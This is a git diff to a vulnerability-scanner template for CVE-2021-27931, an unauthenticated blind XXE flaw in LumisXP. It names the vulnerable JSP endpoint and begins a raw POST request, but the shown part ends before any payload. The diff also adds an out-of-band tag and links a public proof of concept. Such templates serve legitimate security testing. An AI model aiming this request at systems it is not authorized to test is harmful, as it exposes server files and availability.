diff --git a/cves/2021/CVE-2021-27931.yaml b/cves/2021/CVE-2021-27931.yaml index 4e5a133f4d..fc0d3806b8 100644 --- a/cves/2021/CVE-2021-27931.yaml +++ b/cves/2021/CVE-2021-27931.yaml @@ -6,24 +6,20 @@ info: severity: critical description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-27931 - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt - tags: cve,cve2021,lumis,xxe + - https://nvd.nist.gov/vuln/detail/CVE-2021-27931 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.10 cve-id: CVE-2021-27931 cwe-id: CWE-611 - + tags: cve,cve2021,lumis,xxe,oast requests: - raw: - | POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1 Host: {{Hostname}} - Content-Length: 197 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) - Accept-Encoding: gzip, deflate